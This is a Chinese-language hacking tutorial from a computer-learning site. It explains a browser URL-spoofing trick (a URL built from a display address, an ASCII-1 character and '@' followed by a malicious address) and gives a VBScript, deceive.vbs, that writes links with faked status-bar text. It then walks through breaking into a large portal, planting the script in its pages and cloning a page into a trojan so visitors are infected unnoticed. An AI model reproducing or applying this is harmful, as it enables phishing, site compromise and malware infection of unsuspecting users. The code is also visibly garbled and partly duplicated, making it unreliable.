萬盛學電腦網

 萬盛學電腦網 >> 病毒防治 >> 域名欺騙技術

域名欺騙技術

網頁木馬種植方案一直都存在很大的問題,當然欺騙需要技巧也需要時間,我們現在不需要那麼麻煩的欺騙,本文就是教大家利用最新浏覽器漏洞實現域名的欺騙.....
前言
域名欺騙有多種實現方法,本文所說的是利用客戶端浏覽器的漏洞來欺騙用戶。
多數浏覽器都會存在這個漏洞,目前暫時還沒相應的補丁。漏洞是這樣的:
當用戶通過浏覽器訪問一個url,如果這個url是經過以下的格式構造的,那麼浏覽器實際將訪問經過構造的惡意頁面,而用戶浏覽器的地址欄裡所顯示的將是虛假的url:
url的構造格式為:
_1][special_char]@[url_2]/ target=_blank>http://[url_1][special_char]@[url_2]
說明:
url_1為用戶所看到的地址,地址中不可以帶/
special_char為一個特殊的字符,即ascii碼為1的字符
url_2為惡意頁面地址

利用過程

首先請看這個測試頁面:
<html>
<head>
<title>域名欺騙技術實例</title>
</head>
<body link=#0000ff alink=#0000ff vlink=#0000ff>
你可以看看這兩個鏈接有什麼區別:<br>
<h1>鏈接1:<script language=vbscript src=deceive.vbs></script></h1>
<h1>鏈接2:<a href=_blank ?>www.163.com target=_blank>http://www.163.com/; target=_blank http://ww ... ;>" target=_blank>www.163.com</a></h1>
</body>
</html>


這個網頁源代碼,其中鏈接1指向了一個vbs腳本,而鏈接2指向的是163站點。如果我們把連接一的vbs腳本改成下列代碼:
''''''''''''''''''''''''''''''''''''''deceive.vbs'''''''''''''''''''''''''''''''''''''''''''''
'(以下請根據實際情況自行修改:)
url1=http://www.163.com/
url2=http://www.google.com/
text=http://www.163.com/
url=_blank ?>http://;&url1&chr(1)& ... p;url2&
dn=/
mouseover=onmouseover=javascript :window.status='_blank ?>http://;&url1&dn&'
mouseout=onmouseout=javascript :window.status=''
click=onclick=javascript :navigate('&url&')
style=style=cursor:hand
tag=<span &style& &mouseover& &mouseout& &click&><font color=#0000ff><u>&text&</u></font></span>
document.write tag
'說明:
'url1是用來欺騙用戶的地址.
'url2是實際訪問的地址,可以是網頁木馬、惡意網頁等.
'text是鏈接的文字.
'注意:(以上欺騙地址及實際地址不可以加http://)
'''''''''''''''''''''''''''''''''''''''cuts here''''''''''''''''''''''''''''''''''''''''''''''''

現在大家看到了吧~~當我們點擊這個測試頁面的時候,鏈接1指向的是google.com,而且狀態欄和地址欄裡都顯示_blank>http://www.163.com/,鏈接2卻指向163.com。你也許感到不可思議,但這就是域名欺騙漏洞的魅力。

我們可以想象,如果以上的測試頁面中的鏈接1指向的不是google.com,而是我們的網頁木馬,那就......

不過,一個普通的個人網站沒人會看的,這就需要我們把這種假鏈接添加到別的大網站的頁面之中。假設我們入侵了一個比較大的網站,比如網易(哇~~~~~~這時候一只菜鳥推著一車磚頭,看著我......)。這時候就可以把它的頁面給改了。
比如有一個文字鏈接,我們就可以把代碼中的<a href=xxxxx.htm>xxxxxx</a>改為我們自己的代碼:<script language=vbscript src=deceive.vbs></script>。看到src屬性裡的deceive.vbs了嗎 ?我們要編輯好這個文件,然後上傳到要修改的頁面目錄下。

這樣還不行,我們還要把自己的木馬網頁的界面修改一下。也就是把原來鏈接到的頁面加入到我們自己的木馬網頁,並且我們的木馬網頁裡的所有鏈接等內容要和原來的頁面一樣,否則就會引起用戶的懷疑。現在,我們把google網站的首頁源代碼全部復制下來,添加到我們的網頁木馬。把復制下來的代碼中的圖片或者是鏈接的文件都修改完整,比如logo.gif改為_blank>/UpLoadFiles/NewsPhoto/comalogo.gif,否則網頁就和原來的不一樣了(圖片顯示為紅色的×,鏈接也失效),因為用戶打開的是你的站點,而你的站點中並沒有logo.gif。都修改好後就可以保存文件了。上傳到你的網頁空間裡。

至此,我們的工作已經完成。喝一杯咖啡,休息一會......

當我們進入這個網站後,點擊我們修改過的連接,你會發現和原來的頁面幾乎就一模一樣(當然,也有些細微的區別,不過一般很難覺察)。就當人家在浏覽這個網頁的時候,他已經在不知不覺中中了木馬,而你也開心地笑呢!~呵呵
列代碼:
''''''''''''''''''''''''''''''''''''''deceive.vbs'''''''''''''''''''''''''''''''''''''''''''''
'(以下請根據實際情況自行修改:)
url1=http://www.163.com/
url2=http://www.google.com/
text=http://www.163.com/
url=_blank ?>http://;&url1&chr(1)& ... p;url2&
dn=/
mouseover=onmouseover=javascript :window.status='_blank ?>http://;&url1&dn&'
mouseout=onmouseout=javascript :window.status=''
click=onclick=javascript :navigate('&url&')
style=style=cursor:hand
tag=<span &style& &mouseover& &mouseout& &click&><font color=#0000ff><u>&text&</u></font></span>
document.write tag
'說明:
'url1是用來欺騙用戶的地址.
'url2是實際訪問的地址。
copyright © 萬盛學電腦網 all rights reserved